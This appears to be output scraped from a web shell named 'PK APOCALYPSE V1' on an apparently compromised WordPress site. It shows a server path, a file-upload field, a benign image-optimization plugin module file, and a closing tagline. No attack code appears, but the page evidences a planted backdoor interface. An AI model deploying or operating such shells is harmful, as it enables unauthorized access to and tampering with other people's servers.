PK APOCALYPSE V1

APOCALYPSE V1

Current Path : /home/wallqcyy/public_html/wp-content/plugins/image-optimization/modules/whats-new/
Upload File :
Current File : /home/wallqcyy/public_html/wp-content/plugins/image-optimization/modules/whats-new/module.php

<?php

namespace ImageOptimization\Modules\WhatsNew;

use ImageOptimization\Classes\Module_Base;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

class Module extends Module_Base {
	public function get_name(): string {
		return 'whats-new';
	}

	public static function component_list(): array {
		return [
			'Notificator',
		];
	}
	public static function routes_list() : array {
		return [
			'Get_Notifications',
		];
	}

	/**
	 * Module constructor.
	 */
	public function __construct() {
		$this->register_routes();
		$this->register_components();
	}
}

if you don't want to be vaporized in a nuclear explosion, i simply have to become nuclear myself… i am atomic